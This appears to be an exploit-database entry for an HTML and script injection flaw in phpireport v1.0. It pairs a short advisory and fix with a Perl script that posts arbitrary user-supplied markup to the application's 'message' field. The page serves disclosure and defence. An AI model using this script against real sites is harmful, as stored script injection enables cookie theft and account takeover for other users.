header-logo
Suggest Exploit
vendor:
phpireport
by:
Or4nG.M4n
7,5
CVSS
HIGH
Html injection
79
CWE
Product Name: phpireport
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: YES
Related CWE: N/A
CPE: //a:phpireport
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Remote Html Code injection

The vulnerability exists in the phpireport v1.0 application due to improper sanitization of user-supplied input in the 'message' parameter of the 'index.php' script. An attacker can inject malicious HTML and script code into the application, which will be executed in the browser of the victim in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

The application should properly sanitize user-supplied input before using it in the HTML page.
Source

Exploit-DB raw data:

#!/usr/bin/perl
########################################################################
# Title    = phpireport v1.0 => Remote Html Code injection
# Author   = Or4nG.M4n
# Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar
# Thnks :
# +----------------------------------+
# |   xSs m4n   i-Hmx   h311 c0d3    |
# |   Dr.Bnned ahwak2000 sa^Dev!L    |
# +----------------------------------+
#
#	                                 Html injection 
# vuln : messages_viewer.php
# vuln : home.php
# vuln : history.php
# code :
#	
#	echo "
#		<li>
#			<div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div>
#			<br>
#			<div class='post-details'>".stripslashes($message)."</div>
#		</li>
#	";
# How i can Fixed ..
# in all vuln file 
# Replace : stripslashes => Replace with => htmlspecialchars
# Thnks to All Stupid Coders 
#
use LWP::UserAgent;

print "Code to inject #";
my $inj = <STDIN>;
chomp $inj;
my $url = 'http://localhost/phpireport/index.php';

my $ua       = LWP::UserAgent->new();
my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'>&lt;/textarea&gt;
my $content  = $response->decoded_content();
print "\n done \n";

# The End

Navigation

Suggest Exploit

Services By CQR